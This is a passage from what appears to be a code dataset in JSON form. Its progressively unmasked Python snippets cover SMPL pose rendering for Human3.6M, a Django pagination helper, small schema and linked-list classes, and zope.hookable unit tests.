= plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-5": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 17:27:57 2020\n\n@author: li\n\"\"\"\n\nimport numpy as np\nfrom opendr.renderer import ColoredRenderer \nfrom opendr.lighting import LambertianPointLight\nfrom opendr.camera import ProjectPoints\nimport cPickle as pkl\nfrom models.smpl import Smpl, copy_smpl, joints_coco\nimport h5py\nfrom util import im\nfrom render_model import render_model\nfrom util.imutils import crop\nimport cv2\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport scipy.io as sio\n\nindex = 800\n\n#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\n#spin = '../SPIN_MV/S1_single_smplify.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\n#our = '../SPIN_MV/S1_multi_smplify.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\n\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\n#plt.ion()\n#gt_keypoints = np.zeros((400,24,4))\nfor i in range(70563,70564):\n imgname = mpi_inf_valid['imgname'][i]\n #print(join(ROOT,imgname))\n rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n #gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]\n camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n w, h = (IMG_RES, IMG_RES)\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n ort = np.reshape(pose_spin[:3],(3,1))\n #print(ort)\n ort_mat = cv2.Rodrigues(ort)[0]\n #print(ort_mat)\n trans_mat = np.array([[-1,0,0],\n [0,-1,0],\n [0,0,1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n fig = plt.figure()\n #plt.subplot(1,3,1)\n plt.imshow(rgb_img)\n \n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_original_%06d.png\" % (i), dpi=300)\n \n fig = plt.figure()\n #plt.subplot(1,3,2)\n plt.imshow(rgb_img)\n plt.imshow(im)\n \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_our_%06d.png\" % (i), dpi=300)\n \n #fig = plt.figure()\n #plt.subplot()\n #plt.imshow(im_1)\n # 如果dpi=300,那么图像大小=height*width \n # fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n # plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n # plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n #plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n #plt.margins(0,0)\n #plt.axis('off')\n #plt.savefig(\"../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png\" % (i), dpi=300)\n \n fig = plt.figure()\n #plt.subplot(1,3,3)\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_spin_%06d.png\" % (i), dpi=300)\n \n #plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)\n #plt.pause(1e-3)\n \n\n\n\"\"\"\niter_num = 25\nbatch_size = 4\nfor i in range(24,25): # iteration number\n for j in range(2,3): #batch_size\n for k in range(1,2):\n imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]\n #print(join(ROOT,imgname))\n rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)\n center = mpi_inf_valid['center'][i*batch_size+j][k]\n scale = mpi_inf_valid['scale'][i*batch_size+j][k]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]\n betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]\n camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]\n #gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]\n #camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n w, h = (IMG_RES, IMG_RES)\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]\n betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]\n camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]\n #camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n # orignal image\n fig = plt.figure()\n #plt.imshow(im+)\n #plt.subplot(1,3,1)\n plt.imshow(rgb_img)\n plt.axis('off')\n #plt.subplot(1,3,2)\n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png\" % (i*batch_size+j, k), dpi=300)\n \n # multi\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n plt.axis('off')\n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png\" % (i*batch_size+j, k), dpi=300)\n #plt.imshow(img[sample_idx].transpose((1,2,0)))\n #plt.subplot(1,2,1)\n \n # single\n fig = plt.figure()\n #plt.subplot(1,3,3)\n plt.imshow(rgb_img)\n #plt.imshow(img[sample_idx].transpose((1,2,0)))\n #plt.subplot(1,2,1)\n plt.imshow(im_spin)\n plt.axis('off')\n #plt.ioff()\n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_single.png\" % (i*batch_size+j, k), dpi=300)\n #plt.pause(1e-3)\n #plt.show()\n\"\"\"\n\"\"\"\nH36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]\nH36M_TO_J14 = H36M_TO_J17[:14]\nJ24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]\nJ24_TO_J14 = J24_TO_J17[:14]\njoint_mapper_gt = J24_TO_J14\njoint_mapper_h36m = H36M_TO_J14\ngt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]\nsio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})\nsio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})\nsio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})\n\"\"\"",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pagination(request, queryset, display_amount=15, after_range_num=5,
bevor_range_num=4):
paginator = Paginator(queryset, display_amount)
try:
page = int(request.GET['page'])
except:
page = 1
try:
objects = paginator.page(page)
except paginator.EmptyPage:
objects = paginator.page(paginator.num_pages)
except:
objects = paginator.page(1)
if page >= after_range_num:
page_range = paginator.page_range[page - after_range_num:page +
bevor_range_num]
else:
page_range = paginator.page_range[0:page + bevor_range_num]
return objects, page_range
<|reserved_special_token_1|>
from django.core.paginator import Paginator
def pagination(request, queryset, display_amount=15, after_range_num=5,
bevor_range_num=4):
paginator = Paginator(queryset, display_amount)
try:
page = int(request.GET['page'])
except:
page = 1
try:
objects = paginator.page(page)
except paginator.EmptyPage:
objects = paginator.page(paginator.num_pages)
except:
objects = paginator.page(1)
if page >= after_range_num:
page_range = paginator.page_range[page - after_range_num:page +
bevor_range_num]
else:
page_range = paginator.page_range[0:page + bevor_range_num]
return objects, page_range
<|reserved_special_token_1|>
# -*- coding:utf-8 -*-
#
from django.core.paginator import Paginator
def pagination(request, queryset, display_amount=15, after_range_num=5, bevor_range_num=4):
# 按参数分页
paginator = Paginator(queryset, display_amount)
try:
# 得到request中的page参数
page = int(request.GET['page'])
except:
# 默认为1
page = 1
try:
# 尝试获得分页列表
objects = paginator.page(page)
# 如果页数不存在
except paginator.EmptyPage:
# 获得最后一页
objects = paginator.page(paginator.num_pages)
# 如果不是一个整数
except:
# 获得第一页
objects = paginator.page(1)
# 根据参数配置导航显示范围
if page >= after_range_num:
page_range = paginator.page_range[page-after_range_num:page+bevor_range_num]
else:
page_range = paginator.page_range[0:page+bevor_range_num]
return objects, page_range
|
flexible
|
{
"blob_id": "7a2b33d1763e66335c6a72a35082e20725cab03d",
"index": 3318,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5,\n bevor_range_num=4):\n paginator = Paginator(queryset, display_amount)\n try:\n page = int(request.GET['page'])\n except:\n page = 1\n try:\n objects = paginator.page(page)\n except paginator.EmptyPage:\n objects = paginator.page(paginator.num_pages)\n except:\n objects = paginator.page(1)\n if page >= after_range_num:\n page_range = paginator.page_range[page - after_range_num:page +\n bevor_range_num]\n else:\n page_range = paginator.page_range[0:page + bevor_range_num]\n return objects, page_range\n",
"step-3": "from django.core.paginator import Paginator\n\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5,\n bevor_range_num=4):\n paginator = Paginator(queryset, display_amount)\n try:\n page = int(request.GET['page'])\n except:\n page = 1\n try:\n objects = paginator.page(page)\n except paginator.EmptyPage:\n objects = paginator.page(paginator.num_pages)\n except:\n objects = paginator.page(1)\n if page >= after_range_num:\n page_range = paginator.page_range[page - after_range_num:page +\n bevor_range_num]\n else:\n page_range = paginator.page_range[0:page + bevor_range_num]\n return objects, page_range\n",
"step-4": "# -*- coding:utf-8 -*-\n#\nfrom django.core.paginator import Paginator\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5, bevor_range_num=4):\n # 按参数分页\n paginator = Paginator(queryset, display_amount)\n try:\n # 得到request中的page参数\n page = int(request.GET['page'])\n except:\n # 默认为1\n page = 1\n try:\n # 尝试获得分页列表\n objects = paginator.page(page)\n # 如果页数不存在\n except paginator.EmptyPage:\n # 获得最后一页\n objects = paginator.page(paginator.num_pages)\n # 如果不是一个整数\n except:\n # 获得第一页\n objects = paginator.page(1)\n # 根据参数配置导航显示范围\n if page >= after_range_num:\n page_range = paginator.page_range[page-after_range_num:page+bevor_range_num]\n else:\n page_range = paginator.page_range[0:page+bevor_range_num]\n return objects, page_range\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from quiz.schema.base import Schema
from quiz.schema.schemas import UserSchemas
class RegisterSchema(Schema):
"""
注册
"""
_schema = UserSchemas.REG_SCHEMA.value
class LoginSchema(Schema):
"""
登录
"""
_schema = UserSchemas.LOGIN_SCHEMA.value
|
normal
|
{
"blob_id": "e0d7fb8a9799c91dca0ca0827a5149804c9efabb",
"index": 7082,
"step-1": "<mask token>\n\n\nclass RegisterSchema(Schema):\n <mask token>\n <mask token>\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-2": "<mask token>\n\n\nclass RegisterSchema(Schema):\n <mask token>\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-3": "<mask token>\n\n\nclass RegisterSchema(Schema):\n \"\"\"\n 注册\n \"\"\"\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-4": "from quiz.schema.base import Schema\nfrom quiz.schema.schemas import UserSchemas\n\n\nclass RegisterSchema(Schema):\n \"\"\"\n 注册\n \"\"\"\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
from cancion import *
class NodoLista:
def __init__(self, cancion, s, a):
self.elemento = cancion
self.siguiente = s
self.anterior = a
|
normal
|
{
"blob_id": "1fb3904d48905ade8f83b6e052057e80302ec5a7",
"index": 4253,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NodoLista:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass NodoLista:\n\n def __init__(self, cancion, s, a):\n self.elemento = cancion\n self.siguiente = s\n self.anterior = a\n",
"step-4": "from cancion import *\n\n\nclass NodoLista:\n\n def __init__(self, cancion, s, a):\n self.elemento = cancion\n self.siguiente = s\n self.anterior = a\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test the hookable support Extension
"""
import unittest
def return_foo():
return 'FOO'
def return_bar():
return 'BAR'
def not_called():
raise AssertionError("This should not be called")
class PyHookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
return _py_hookable(*args, **kw)
class HookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
from zope.hookable import hookable
if hookable is _py_hookable:
raise unittest.SkipTest("Hookable and PyHookable are the same")
return hookable(*args, **kw) # pragma: no cover
class PyHookableTests(PyHookableMixin,
unittest.TestCase):
def test_pure_python(self):
from zope.hookable import _PURE_PYTHON
from zope.hookable import _c_hookable
from zope.hookable import _py_hookable
from zope.hookable import hookable
self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)
def test_before_hook(self):
hooked = self._callFUT(return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_after_hook(self):
hooked = self._callFUT(not_called)
old = hooked.sethook(return_bar)
self.assertIs(old, not_called)
self.assertIs(hooked.original, not_called)
self.assertIs(hooked.implementation, return_bar)
self.assertEqual(hooked(), 'BAR')
def test_after_hook_and_reset(self):
hooked = self._callFUT(return_foo)
old = hooked.sethook(not_called)
hooked.reset()
self.assertIs(old, return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_original_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
with self.assertRaises((TypeError, AttributeError)):
del hooked.original
def test_implementation_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
with self.assertRaises((TypeError, AttributeError)):
del hooked.implementation
def test_no_args(self):
with self.assertRaises(TypeError):
self._callFUT()
def test_too_many_args(self):
with self.assertRaises(TypeError):
self._callFUT(not_called, not_called)
def test_w_implementation_kwarg(self):
hooked = self._callFUT(implementation=return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_w_unknown_kwarg(self):
with self.assertRaises(TypeError):
self._callFUT(nonesuch=42)
def test_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertIsInstance(hooked(), C)
hooked.sethook(return_bar)
self.assertEqual(hooked(), 'BAR')
class TestIssue6Py(PyHookableMixin,
unittest.TestCase):
# Make sphinx docs for hooked objects work.
# https://github.com/zopefoundation/zope.hookable/issues/6
# We need to proxy __doc__ to the original,
# and synthesize an empty __bases__ and a __dict__ attribute
# if they're not present.
def _check_preserves_doc(self, docs):
self.assertEqual("I have some docs", docs.__doc__)
hooked = self._callFUT(docs)
self.assertEqual(hooked.__doc__, docs.__doc__)
def test_preserves_doc_function(self):
def docs():
"""I have some docs"""
self._check_preserves_doc(docs)
def test_preserves_doc_class(self):
class Docs:
"""I have some docs"""
self._check_preserves_doc(Docs)
def test_empty_bases_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual((), hooked.__bases__)
def test_empty_dict_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual({}, hooked.__dict__)
def test_bases_class(self):
class C:
pass
self.assertEqual(C.__bases__, (object,))
hooked = self._callFUT(C)
self.assertEqual(hooked.__bases__, (object,))
def test_dict_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertEqual(hooked.__dict__, C.__dict__)
def test_non_string_attr_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(TypeError):
getattr(hooked, 42)
with self.assertRaises(TypeError):
hooked.__getattribute__(42)
def test_unicode_attribute_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
result = hooked.__getattribute__('__bases__')
self.assertEqual(result, ())
def test_short_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(AttributeError):
hooked.__getattribute__('')
class HookableTests(HookableMixin, PyHookableTests):
pass
class TestIssue6(HookableMixin, TestIssue6Py):
pass
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
normal
|
{
"blob_id": "13c0af340c4fff815919d7cbb1cfd3116be13771",
"index": 7907,
"step-1": "<mask token>\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n <mask token>\n <mask token>\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n <mask token>\n <mask token>\n <mask token>\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, ())\n\n def test_short_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(AttributeError):\n hooked.__getattribute__('')\n\n\nclass HookableTests(HookableMixin, PyHookableTests):\n pass\n\n\nclass TestIssue6(HookableMixin, TestIssue6Py):\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PyHookableTests(PyHookableMixin, unittest.TestCase):\n\n def test_pure_python(self):\n from zope.hookable import _PURE_PYTHON\n from zope.hookable import _c_hookable\n from zope.hookable import _py_hookable\n from zope.hookable import hookable\n self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)\n\n def test_before_hook(self):\n hooked = self._callFUT(return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_after_hook(self):\n hooked = self._callFUT(not_called)\n old = hooked.sethook(return_bar)\n self.assertIs(old, not_called)\n self.assertIs(hooked.original, not_called)\n self.assertIs(hooked.implementation, return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n def test_after_hook_and_reset(self):\n hooked = self._callFUT(return_foo)\n old = hooked.sethook(not_called)\n hooked.reset()\n self.assertIs(old, return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_original_cannot_be_deleted(self):\n hooked = self._callFUT(not_called)\n with self.assertRaises((TypeError, AttributeError)):\n del hooked.original\n <mask token>\n\n def test_no_args(self):\n with self.assertRaises(TypeError):\n self._callFUT()\n\n def test_too_many_args(self):\n with self.assertRaises(TypeError):\n self._callFUT(not_called, not_called)\n\n def test_w_implementation_kwarg(self):\n hooked = self._callFUT(implementation=return_foo)\n self.assertIs(hooked.original, return_foo)\n self.assertIs(hooked.implementation, return_foo)\n self.assertEqual(hooked(), 'FOO')\n\n def test_w_unknown_kwarg(self):\n with self.assertRaises(TypeError):\n self._callFUT(nonesuch=42)\n\n def test_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertIsInstance(hooked(), C)\n hooked.sethook(return_bar)\n self.assertEqual(hooked(), 'BAR')\n\n\nclass TestIssue6Py(PyHookableMixin, unittest.TestCase):\n\n def _check_preserves_doc(self, docs):\n self.assertEqual('I have some docs', docs.__doc__)\n hooked = self._callFUT(docs)\n self.assertEqual(hooked.__doc__, docs.__doc__)\n\n def test_preserves_doc_function(self):\n\n def docs():\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(docs)\n\n def test_preserves_doc_class(self):\n\n\n class Docs:\n \"\"\"I have some docs\"\"\"\n self._check_preserves_doc(Docs)\n\n def test_empty_bases_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual((), hooked.__bases__)\n\n def test_empty_dict_function(self):\n hooked = self._callFUT(return_foo)\n self.assertEqual({}, hooked.__dict__)\n\n def test_bases_class(self):\n\n\n class C:\n pass\n self.assertEqual(C.__bases__, (object,))\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__bases__, (object,))\n\n def test_dict_class(self):\n\n\n class C:\n pass\n hooked = self._callFUT(C)\n self.assertEqual(hooked.__dict__, C.__dict__)\n\n def test_non_string_attr_name(self):\n hooked = self._callFUT(return_foo)\n with self.assertRaises(TypeError):\n getattr(hooked, 42)\n with self.assertRaises(TypeError):\n hooked.__getattribute__(42)\n\n def test_unicode_attribute_name(self):\n hooked = self._callFUT(return_foo)\n result = hooked.__getattribute__('__bases__')\n self.assertEqual(result, 